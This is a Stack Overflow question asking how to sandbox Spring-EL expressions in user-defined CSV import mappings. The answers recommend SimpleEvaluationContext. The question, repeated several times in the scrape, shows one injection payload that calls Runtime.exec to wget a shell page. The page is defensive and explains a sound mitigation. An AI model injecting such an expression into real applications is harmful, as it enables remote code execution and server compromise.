Can Spring-EL expressions be executed within a sandbox?











up vote
0
down vote

favorite












I am using Spring-EL to create dynamic csv-field to class-field mappings used in different Spring-Batch import jobs. (Different input files, same output classes). This is working very good but the idea is that it must be possible for a user to create such a mapping configuration.



The problem is that the Spring-EL expressions are not executed inside a kind of sandbox and therefor it is very easy to inject evil code. For example:



name: T(java.lang.Runtime).getRuntime().exec("wget http://localhost:8090/shell.jsp")



My question is, how can I run Spring-EL inside some kind of sandbox or restrict access to only a specific set of methods/classes? I cannot find any thing related to this topic. Are maybe Spring-EL is not the right choice for the job.



Example of what I try to achieve:



name: column[0]

category: concat(' ', column[18], column[19])

age: split(column[3], '/', 0)





spring sandbox spring-el







share|improve this question




















  • 1




    docs.spring.io/spring/docs/5.1.2.RELEASE/…. See SimpleEvaluationContext
    – Artem Bilan
    Nov 19 at 15:06










  • Thanks! Now using SimpleEvaluationContext.forReadOnlyDataBinding().withInstanceMethods().build();
    – Mark Ebbers
    Nov 19 at 16:01















up vote
0
down vote

favorite












I am using Spring-EL to create dynamic csv-field to class-field mappings used in different Spring-Batch import jobs. (Different input files, same output classes). This is working very good but the idea is that it must be possible for a user to create such a mapping configuration.



The problem is that the Spring-EL expressions are not executed inside a kind of sandbox and therefor it is very easy to inject evil code. For example:



name: T(java.lang.Runtime).getRuntime().exec("wget http://localhost:8090/shell.jsp")



My question is, how can I run Spring-EL inside some kind of sandbox or restrict access to only a specific set of methods/classes? I cannot find any thing related to this topic. Are maybe Spring-EL is not the right choice for the job.



Example of what I try to achieve:



name: column[0]

category: concat(' ', column[18], column[19])

age: split(column[3], '/', 0)





spring sandbox spring-el







share|improve this question




















  • 1




    docs.spring.io/spring/docs/5.1.2.RELEASE/…. See SimpleEvaluationContext
    – Artem Bilan
    Nov 19 at 15:06










  • Thanks! Now using SimpleEvaluationContext.forReadOnlyDataBinding().withInstanceMethods().build();
    – Mark Ebbers
    Nov 19 at 16:01













up vote
0
down vote

favorite









up vote
0
down vote

favorite











I am using Spring-EL to create dynamic csv-field to class-field mappings used in different Spring-Batch import jobs. (Different input files, same output classes). This is working very good but the idea is that it must be possible for a user to create such a mapping configuration.



The problem is that the Spring-EL expressions are not executed inside a kind of sandbox and therefor it is very easy to inject evil code. For example:



name: T(java.lang.Runtime).getRuntime().exec("wget http://localhost:8090/shell.jsp")



My question is, how can I run Spring-EL inside some kind of sandbox or restrict access to only a specific set of methods/classes? I cannot find any thing related to this topic. Are maybe Spring-EL is not the right choice for the job.



Example of what I try to achieve:



name: column[0]

category: concat(' ', column[18], column[19])

age: split(column[3], '/', 0)





spring sandbox spring-el







share|improve this question















I am using Spring-EL to create dynamic csv-field to class-field mappings used in different Spring-Batch import jobs. (Different input files, same output classes). This is working very good but the idea is that it must be possible for a user to create such a mapping configuration.



The problem is that the Spring-EL expressions are not executed inside a kind of sandbox and therefor it is very easy to inject evil code. For example:



name: T(java.lang.Runtime).getRuntime().exec("wget http://localhost:8090/shell.jsp")



My question is, how can I run Spring-EL inside some kind of sandbox or restrict access to only a specific set of methods/classes? I cannot find any thing related to this topic. Are maybe Spring-EL is not the right choice for the job.



Example of what I try to achieve:



name: column[0]

category: concat(' ', column[18], column[19])

age: split(column[3], '/', 0)





spring sandbox spring-el




spring sandbox spring-el






share|improve this question















share|improve this question













share|improve this question




share|improve this question








edited Nov 19 at 15:08

























asked Nov 19 at 15:03









Mark Ebbers

154




154








  • 1




    docs.spring.io/spring/docs/5.1.2.RELEASE/…. See SimpleEvaluationContext
    – Artem Bilan
    Nov 19 at 15:06










  • Thanks! Now using SimpleEvaluationContext.forReadOnlyDataBinding().withInstanceMethods().build();
    – Mark Ebbers
    Nov 19 at 16:01














  • 1




    docs.spring.io/spring/docs/5.1.2.RELEASE/…. See SimpleEvaluationContext
    – Artem Bilan
    Nov 19 at 15:06










  • Thanks! Now using SimpleEvaluationContext.forReadOnlyDataBinding().withInstanceMethods().build();
    – Mark Ebbers
    Nov 19 at 16:01








1




1




docs.spring.io/spring/docs/5.1.2.RELEASE/…. See SimpleEvaluationContext
– Artem Bilan
Nov 19 at 15:06




docs.spring.io/spring/docs/5.1.2.RELEASE/…. See SimpleEvaluationContext
– Artem Bilan
Nov 19 at 15:06












Thanks! Now using SimpleEvaluationContext.forReadOnlyDataBinding().withInstanceMethods().build();
– Mark Ebbers
Nov 19 at 16:01




Thanks! Now using SimpleEvaluationContext.forReadOnlyDataBinding().withInstanceMethods().build();
– Mark Ebbers
Nov 19 at 16:01












1 Answer
1






active

oldest

votes

















up vote
1
down vote



accepted










The SimpleEvaluationContext has been designed to decrease application vulnerabilities.



See https://docs.spring.io/spring/docs/5.1.2.RELEASE/spring-framework-reference/core.html#expressions-evaluation-context for more info:




SimpleEvaluationContext is designed to support only a subset of the SpEL language syntax. It excludes Java type references, constructors, and bean references. It also requires you to explicitly choose the level of support for properties and methods in expressions. By default, the create() static factory method enables only read access to properties.







share|improve this answer





















    Your Answer






    StackExchange.ifUsing("editor", function () {
    StackExchange.using("externalEditor", function () {
    StackExchange.using("snippets", function () {
    StackExchange.snippets.init();
    });
    });
    }, "code-snippets");

    StackExchange.ready(function() {
    var channelOptions = {
    tags: "".split(" "),
    id: "1"
    };
    initTagRenderer("".split(" "), "".split(" "), channelOptions);

    StackExchange.using("externalEditor", function() {
    // Have to fire editor after snippets, if snippets enabled
    if (StackExchange.settings.snippets.snippetsEnabled) {
    StackExchange.using("snippets", function() {
    createEditor();
    });
    }
    else {
    createEditor();
    }
    });

    function createEditor() {
    StackExchange.prepareEditor({
    heartbeatType: 'answer',
    convertImagesToLinks: true,
    noModals: true,
    showLowRepImageUploadWarning: true,
    reputationToPostImages: 10,
    bindNavPrevention: true,
    postfix: "",
    imageUploader: {
    brandingHtml: "Powered by u003ca class="icon-imgur-white" href="https://imgur.com/"u003eu003c/au003e",
    contentPolicyHtml: "User contributions licensed under u003ca href="https://creativecommons.org/licenses/by-sa/3.0/"u003ecc by-sa 3.0 with attribution requiredu003c/au003e u003ca href="https://stackoverflow.com/legal/content-policy"u003e(content policy)u003c/au003e",
    allowUrls: true
    },
    onDemand: true,
    discardSelector: ".discard-answer"
    ,immediatelyShowMarkdownHelp:true
    });


    }
    });














     

    draft saved


    draft discarded


















    StackExchange.ready(
    function () {
    StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2fstackoverflow.com%2fquestions%2f53377386%2fcan-spring-el-expressions-be-executed-within-a-sandbox%23new-answer', 'question_page');
    }
    );

    Post as a guest















    Required, but never shown

























    1 Answer
    1






    active

    oldest

    votes








    1 Answer
    1






    active

    oldest

    votes









    active

    oldest

    votes






    active

    oldest

    votes








    up vote
    1
    down vote



    accepted










    The SimpleEvaluationContext has been designed to decrease application vulnerabilities.



    See https://docs.spring.io/spring/docs/5.1.2.RELEASE/spring-framework-reference/core.html#expressions-evaluation-context for more info:




    SimpleEvaluationContext is designed to support only a subset of the SpEL language syntax. It excludes Java type references, constructors, and bean references. It also requires you to explicitly choose the level of support for properties and methods in expressions. By default, the create() static factory method enables only read access to properties.







    share|improve this answer

























      up vote
      1
      down vote



      accepted










      The SimpleEvaluationContext has been designed to decrease application vulnerabilities.



      See https://docs.spring.io/spring/docs/5.1.2.RELEASE/spring-framework-reference/core.html#expressions-evaluation-context for more info:




      SimpleEvaluationContext is designed to support only a subset of the SpEL language syntax. It excludes Java type references, constructors, and bean references. It also requires you to explicitly choose the level of support for properties and methods in expressions. By default, the create() static factory method enables only read access to properties.







      share|improve this answer























        up vote
        1
        down vote



        accepted







        up vote
        1
        down vote



        accepted






        The SimpleEvaluationContext has been designed to decrease application vulnerabilities.



        See https://docs.spring.io/spring/docs/5.1.2.RELEASE/spring-framework-reference/core.html#expressions-evaluation-context for more info:




        SimpleEvaluationContext is designed to support only a subset of the SpEL language syntax. It excludes Java type references, constructors, and bean references. It also requires you to explicitly choose the level of support for properties and methods in expressions. By default, the create() static factory method enables only read access to properties.







        share|improve this answer












        The SimpleEvaluationContext has been designed to decrease application vulnerabilities.



        See https://docs.spring.io/spring/docs/5.1.2.RELEASE/spring-framework-reference/core.html#expressions-evaluation-context for more info:




        SimpleEvaluationContext is designed to support only a subset of the SpEL language syntax. It excludes Java type references, constructors, and bean references. It also requires you to explicitly choose the level of support for properties and methods in expressions. By default, the create() static factory method enables only read access to properties.








        share|improve this answer












        share|improve this answer



        share|improve this answer










        answered Nov 19 at 16:04









        Artem Bilan

        62.5k84567




        62.5k84567






























             

            draft saved


            draft discarded



















































             


            draft saved


            draft discarded














            StackExchange.ready(
            function () {
            StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2fstackoverflow.com%2fquestions%2f53377386%2fcan-spring-el-expressions-be-executed-within-a-sandbox%23new-answer', 'question_page');
            }
            );

            Post as a guest















            Required, but never shown





















































            Required, but never shown














            Required, but never shown












            Required, but never shown







            Required, but never shown

































            Required, but never shown














            Required, but never shown












            Required, but never shown







            Required, but never shown







            -

            Popular posts from this blog

            404 Error Contact Form 7 ajax form submitting

            Image
            0 The contact form does not work, and affects loading after one try. The chrome console shows the error message: POST http://example.com/wp-json/contact-form-7/v1/contact-forms/50/feedback 404 (Not Found) send @ jquery.js?ver=1.12.4:4 ajax @ jquery.js?ver=1.12.4:4 wpcf7.submit @ scripts.js?ver=5.0.3:346 (anonymous) @ scripts.js?ver=5.0.3:53 dispatch @ jquery.js?ver=1.12.4:3 r.handle @ jquery.js?ver=1.12.4:3 How to solve this issue? thanks in advance javascript wordpress contact-form-7 share | improve this question edited Jul 17 '18 at 5:39 Kiran Shahi 4,745 3 16 43
            Read more

            How to know if a Active Directory user can login interactively

            Image
            1 I would like to know if and how is it possible to know if a AD user can login interactively (on a server) in a domain. I need to know if I can find it out using a LDAP search. Thanks. windows active-directory login user-permissions user-profile share | improve this question edited 1 hour ago yagmoth555 ♦ 11.6k 3 17 42 asked 1 hour ago Luigi Luigi 6 1 New contributor
            Read more

            TypeError: fit_transform() missing 1 required positional argument: 'X'

            Image
            0 I am trying to do Feature Scaling in a dataset, but I get an error and have no idea how to proceed: > Traceback (most recent call last): > > File "<ipython-input-10-71bea414b4d0>", line 22, in <module> > x_train = sc_X.fit_transform(x_train) > > TypeError: fit_transform() missing 1 required positional argument: 'X' and here is my code: import pandas as pd # Importing the dataset dataset = pd.read_csv('Data.csv') X = dataset.iloc[:, :-1].values y = dataset.iloc[:, 3].values # Taking care of missing data from sklearn.preprocessing import Imputer imputer = Imputer(missing_values="NaN", strategy="mean", axis=0) imputer = Imputer.fit(imputer,X[:,1:3]) X[:, 1:3] = Imputer.transform(imputer,X[
            Read more